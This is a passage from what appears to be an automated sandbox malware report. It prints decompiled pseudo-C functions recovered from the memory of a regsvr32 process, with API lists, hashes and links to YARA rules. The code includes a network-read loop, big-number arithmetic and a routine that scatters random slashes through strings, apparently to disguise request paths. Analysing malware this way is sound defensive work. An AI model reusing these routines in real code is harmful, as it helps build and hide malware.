										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x1ea2d4; // 0x4c1d5a8
												_t28 = _t108 + 0x1eb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x1ea2d4; // 0x4c1d5a8
														_t33 = _t78 + 0x1eb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x001e6c72
0x001e6c7b
0x001e6c7c
0x001e6c80
0x001e6c86
0x001e6c8c
0x001e6c95
0x001e6c9b
0x001e6ca5
0x001e6ca7
0x001e6cad
0x001e6cb2
0x001e6cbd
0x001e6cc5
0x001e6cc8
0x001e6deb
0x001e6cce
0x001e6cce
0x001e6cdb
0x001e6ce1
0x001e6ce7
0x001e6ceb
0x001e6cf1
0x001e6cfe
0x001e6d02
0x001e6d08
0x001e6d0b
0x001e6d11
0x001e6d17
0x001e6d1d
0x001e6d20
0x001e6d23
0x001e6d29
0x001e6d32
0x001e6d38
0x001e6d39
0x001e6d3c
0x001e6d3d
0x001e6d3e
0x001e6d46
0x001e6d47
0x001e6d48
0x001e6d4a
0x001e6d4e
0x001e6d52
0x00000000
0x00000000
0x001e6d58
0x001e6d61
0x001e6d67
0x001e6d71
0x001e6d75
0x001e6d77
0x001e6d84
0x001e6d88
0x001e6d90
0x001e6d95
0x001e6da7
0x001e6da9
0x001e6daf
0x001e6daf
0x001e6db8
0x001e6db8
0x001e6dba
0x001e6dc0
0x001e6dc0
0x001e6dc3
0x001e6dc9
0x001e6dcc
0x001e6dd5
0x00000000
0x00000000
0x00000000
0x001e6dd5
0x001e6d29
0x001e6d23
0x001e6d0b
0x001e6ddb
0x001e6ddb
0x001e6de1
0x001e6de1
0x001e6de7
0x001e6de7
0x001e6df0
0x001e6df6
0x001e6df6
0x001e6cb2
0x001e6dff

APIs

SysAllocString.OLEAUT32(001E92B0), ref: 001E6CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 001E6D9F
SysFreeString.OLEAUT32(00000000), ref: 001E6DB8
SysFreeString.OLEAUT32(?), ref: 001E6DE7

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 7473f069ef7548e03684766d2b6539a105a89e4c472aaf959b0dd0c4618cd6bf
Instruction ID: c42746f80c57356d5e2f1c58cdb5a6e3ede9a4a7bedb2db8a1458c299c3abb91
Opcode Fuzzy Hash: 7473f069ef7548e03684766d2b6539a105a89e4c472aaf959b0dd0c4618cd6bf
Instruction Fuzzy Hash: BA517D75E0055AEFCB00DFE8C8888AEB7B9FF98304B544598E915EB214D731AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E5D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001E5D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E001E28F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E001E1000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E001E3915(_t101,  &_v428, _a8, _t96 - _t81);
					E001E3915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E001E1000(_t101,  &E001EA188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E001E1000(_a16, _a4);
						E001E3B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L001E7D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L001E7D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E001E679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E001E5AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E001E4A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E001EA188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x001e5d96
0x001e5da2
0x001e5da8
0x001e5dad
0x001e5db1
0x001e5f23
0x001e5f27
0x001e5f27
0x001e5db7
0x001e5dbb
0x001e5dc1
0x001e5dc2
0x001e5dcd
0x001e5dd3
0x001e5dd8
0x001e5ddb
0x001e5df5
0x001e5e04
0x001e5e10
0x001e5e1a
0x001e5e1f
0x001e5e21
0x001e5e24
0x001e5edb
0x001e5ee1
0x001e5ef2
0x001e5f05
0x001e5f1b
0x00000000
0x001e5f20
0x001e5e2d
0x001e5e34
0x001e5e38
0x001e5e3e
0x001e5e40
0x001e5e42
0x001e5e44
0x001e5e46
0x001e5e50
0x001e5e55
0x001e5e57
0x001e5e59
0x001e5e5a
0x001e5e5b
0x001e5e5c
0x001e5e63
0x001e5e6a
0x001e5e6d
0x001e5e6d
0x001e5e3a
0x001e5e3a
0x001e5e3a
0x001e5e75
0x001e5e7d
0x001e5e89
0x001e5e8e
0x001e5e8e
0x001e5e93
0x00000000
0x00000000
0x001e5e95
0x001e5e98
0x001e5ea5
0x00000000
0x00000000
0x001e5ea7
0x001e5ea7
0x001e5eb4
0x001e5e8e
0x001e5e93
0x00000000
0x00000000
0x00000000
0x001e5e93
0x001e5ebe
0x001e5ec1
0x001e5ec4
0x001e5ecb
0x001e5ecb
0x001e5ed8
0x00000000
0x001e5ed8
0x001e5dc4
0x001e5dc8
0x001e5dc9
0x001e5dcb
0x00000000
0x00000000
0x00000000
0x001e5dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 001E5E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001E5E5C
memset.NTDLL ref: 001E5F05
memset.NTDLL ref: 001E5F1B

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 4741d3f0cc46eb58641a2d1e795c4222cd5a3343113e42577491120d08cf3887
Instruction ID: ddc8820aab8793070ac206ac07b1114a1b234d6f6e72b7ed3d808e81ec6b0889
Opcode Fuzzy Hash: 4741d3f0cc46eb58641a2d1e795c4222cd5a3343113e42577491120d08cf3887
Instruction Fuzzy Hash: 4A41E531A00A99AFDB10DF6ACC45BEEB776EF55314F104569F819A7281DB70AF448F80

Uniqueness

Uniqueness Score: -1.00%

Function 001E14A8, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E001E14A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x1ea144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E001E6837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x1ea2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E001E50CA(_v20);
											if(_v8 == 0) {
												_v8 = E001E37FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E001E25C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x001e14a9
0x001e14af
0x001e14ba
0x001e14ba
0x001e14bc
0x001e5aff
0x001e5b02
0x001e5b0b
0x001e5b0e
0x001e5b11
0x001e5b19
0x001e5c17
0x001e5c22
0x001e5c25
0x001e5c27
0x00000000
0x001e5c27
0x001e5b1f
0x001e5b22
0x001e5c2a
0x001e5c2a
0x001e5b28
0x001e5b2b
0x001e5b2c
0x001e5b2e
0x001e5b37
0x001e5c0e
0x001e5b3d
0x001e5b43
0x001e5b4a
0x001e5b4d
0x001e5bfc
0x001e5b53
0x00000000
0x001e5b53
0x001e5b53
0x001e5b53
0x001e5b53
0x001e5b58
0x001e5b5a
0x001e5b5a
0x001e5b67
0x001e5b6f
0x00000000
0x00000000
0x001e5b71
0x001e5b7e
0x001e5b84
0x001e5b84
0x001e5b87
0x00000000
0x00000000
0x001e5b89
0x001e5b94
0x001e5ba8
0x001e5bde
0x001e5baa
0x001e5baa
0x001e5bb1
0x001e5bb9
0x00000000
0x001e5bbb
0x001e5bbb
0x001e5bc6
0x001e5bc9
0x001e5bd0
0x00000000
0x001e5bd0
0x001e5bc9
0x001e5bb9
0x001e5be1
0x001e5be4
0x001e5bec
0x001e5bf7
0x001e5bf7
0x00000000
0x001e5bec
0x001e5b91
0x00000000
0x001e5bd3
0x001e5bd3
0x00000000
0x001e5bdc
0x001e5c03
0x001e5c03
0x001e5c09
0x001e5c09
0x001e5b37
0x001e5b22
0x001e5c34
0x001e14b1
0x001e14b1
0x001e14b8
0x001e14c3
0x00000000
0x00000000
0x00000000
0x001e14b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,001E7134,00000000,?), ref: 001E5B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,001E7134,00000000,?,?), ref: 001E5BBB

Part of subcall function 001E25C7: wcstombs.NTDLL ref: 001E2687

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: d85dd20797198ea92d8e83ca9ac5a03aed5094cd90c6db3b92529b5e08b93aa4
Instruction ID: 5cd5d538e0dda4f1f03232430e18c5a661d09c68e29c048b7eca08b2a0f41f5e
Opcode Fuzzy Hash: d85dd20797198ea92d8e83ca9ac5a03aed5094cd90c6db3b92529b5e08b93aa4
Instruction Fuzzy Hash: 1E412E75900A89EFDF10DFA6D9849AEBBBAFF14348F604469E502E7150D7309E80DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001E52E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001E52E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x1ea290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x1ea2a8; // 0x3c0d90de
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x1ea2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x001e52ed
0x001e52f0
0x001e52f6
0x001e530e
0x001e5312
0x001e5315
0x001e5317
0x001e531a
0x001e531c
0x001e531f
0x001e5321
0x001e5321
0x001e5323
0x001e532e
0x001e5333
0x001e5344
0x001e534c
0x001e5351
0x001e5354
0x001e5357
0x001e5359
0x001e535f
0x001e5362
0x001e5362
0x001e5362
0x001e536d
0x001e5372
0x001e537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001E62E0,00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E52F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 001E5308
memcpy.NTDLL(00000000,04E09630,-00000008,?,?,?,001E62E0,00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E534C
memcpy.NTDLL(00000001,04E09630,00000001,001E70D9,00000000,04E09630), ref: 001E536D

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: addfefa66a66f8246a757cb45a964cac9a40034497e9fcc78a3a381b68beb595
Instruction ID: 3ba932d5ad531f230e54e08e8ad3f91bb39670ab1167d205a48ba4043ed7edc1
Opcode Fuzzy Hash: addfefa66a66f8246a757cb45a964cac9a40034497e9fcc78a3a381b68beb595
Instruction Fuzzy Hash: BD1106B2A00555BFC7108BAADCC4E9EBBFEEB907A0B450266F5049B150EB709E40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001E578C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E001E578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E001E6837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x1e92a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x1e92a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x001e5797
0x001e579b
0x001e579d
0x001e579e
0x001e57a6
0x001e57a6
0x001e57aa
0x00000000
0x00000000
0x001e57a1
0x001e57a2
0x001e57a5
0x001e57a5
0x001e57b2
0x001e57b9
0x001e57bd
0x001e57c5
0x001e57cb
0x001e57cd
0x001e57d2
0x001e57d6
0x001e57d8
0x001e57db
0x001e57e2
0x001e57e2
0x001e57ec
0x001e57ef
0x001e57f2
0x001e57f2
0x001e57fe
0x001e57fe
0x001e580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04E0962C,?,?,?,001E1128,04E0962C,?,?,001E55D3), ref: 001E57A6
StrTrimA.SHLWAPI(?,001E92A4,00000002,?,?,?,001E1128,04E0962C,?,?,001E55D3), ref: 001E57C5
StrChrA.SHLWAPI(?,00000020,?,?,?,001E1128,04E0962C,?,?,001E55D3,?,?,?,?,?,001E6BD8), ref: 001E57D0
StrTrimA.SHLWAPI(00000001,001E92A4,?,?,?,001E1128,04E0962C,?,?,001E55D3,?,?,?,?,?,001E6BD8), ref: 001E57E2

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: a21ce5a579d30d6c3b7b845d37f0f5fd3487c0392775683022bb6e50278adaf5
Instruction ID: f80ae0e1e331c9f8148fedbabb864320ee790b2387acb3a48d9adeccee974d33
Opcode Fuzzy Hash: a21ce5a579d30d6c3b7b845d37f0f5fd3487c0392775683022bb6e50278adaf5
Instruction Fuzzy Hash: 9D01F571A44B91AFD3208F578C49E2FBFD9EF96B94F52051CF841C7240DBA0CC0186A1

Uniqueness

Uniqueness Score: -1.00%

Function 001E5076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E5076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x1ea2c4; // 0x2dc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x1ea308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x1ea2c4; // 0x2dc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1ea290; // 0x4a10000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x001e5076
0x001e507d
0x001e50c7
0x001e50c9
0x001e50c9
0x001e5081
0x001e5087
0x001e508c
0x001e5090
0x001e5096
0x001e509d
0x00000000
0x00000000
0x001e509f
0x001e50a4
0x00000000
0x00000000
0x00000000
0x001e50a4
0x001e50a6
0x001e50ae
0x001e50b1
0x001e50b1
0x001e50b7
0x001e50be
0x001e50c1
0x001e50c1
0x00000000

APIs

SetEvent.KERNEL32(000002DC,00000001,001E56C9), ref: 001E5081
SleepEx.KERNEL32(00000064,00000001), ref: 001E5090
CloseHandle.KERNEL32(000002DC), ref: 001E50B1
HeapDestroy.KERNEL32(04A10000), ref: 001E50C1

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 949a564d94716cb37db84b7bcd9e312de630e919b1bd2c07e3b83e02f61a1ec2
Instruction ID: e45ec4c9051a30200d64b08f8ce9a70e3f793ec575337377789ac644e94ae3ac
Opcode Fuzzy Hash: 949a564d94716cb37db84b7bcd9e312de630e919b1bd2c07e3b83e02f61a1ec2
Instruction Fuzzy Hash: E6F03071B01B929BDB319BF69CCCB5E37ADAF04B51B440154BD05EF9D0CB25E8808A91

Uniqueness

Uniqueness Score: -1.00%

Function 001E10DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E001E10DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x1ea37c; // 0x4e09630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x1ea37c; // 0x4e09630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x1ea030) {
					HeapFree( *0x1ea290, 0, _t8);
				}
				_t14[1] = E001E578C(_v0, _t14);
				_t11 =  *0x1ea37c; // 0x4e09630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x001e10dd
0x001e10dd
0x001e10e6
0x001e10f6
0x001e10f6
0x001e10fb
0x001e1100
0x00000000
0x00000000
0x001e10f0
0x001e10f0
0x001e1102
0x001e1106
0x001e1118
0x001e1118
0x001e1128
0x001e112b
0x001e1130
0x001e1134
0x001e113a

APIs

RtlEnterCriticalSection.NTDLL(04E095F0), ref: 001E10E6
Sleep.KERNEL32(0000000A,?,?,001E55D3,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E10F0
HeapFree.KERNEL32(00000000,00000000,?,?,001E55D3,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E1118
RtlLeaveCriticalSection.NTDLL(04E095F0), ref: 001E1134

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 200cbcdff6341a28f5981837fcaea80eb5d30ea920882f77629b544fb811474f
Instruction ID: 180060a5fbc51484dcd24c886697a78f18aead37cb09fc835bcadac921b5d84c
Opcode Fuzzy Hash: 200cbcdff6341a28f5981837fcaea80eb5d30ea920882f77629b544fb811474f
Instruction Fuzzy Hash: C1F0FE703056C1ABD7219FBADD89B1E7BE8AF14740B458404F655DFA61C730E880CB26

Uniqueness

Uniqueness Score: -1.00%

Function 001E50DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001E50DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x1ea37c; // 0x4e09630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x1ea37c; // 0x4e09630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x1ea37c; // 0x4e09630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x1eb83e) {
					HeapFree( *0x1ea290, 0, _t10);
					_t7 =  *0x1ea37c; // 0x4e09630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x001e50df
0x001e50e8
0x001e50f8
0x001e50f8
0x001e50fd
0x001e5102
0x00000000
0x00000000
0x001e50f2
0x001e50f2
0x001e5104
0x001e5109
0x001e510d
0x001e5120
0x001e5126
0x001e5126
0x001e512f
0x001e5131
0x001e5135
0x001e513b

APIs

RtlEnterCriticalSection.NTDLL(04E095F0), ref: 001E50E8
Sleep.KERNEL32(0000000A,?,?,001E55D3,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E50F2
HeapFree.KERNEL32(00000000,?,?,?,001E55D3,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E5120
RtlLeaveCriticalSection.NTDLL(04E095F0), ref: 001E5135

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

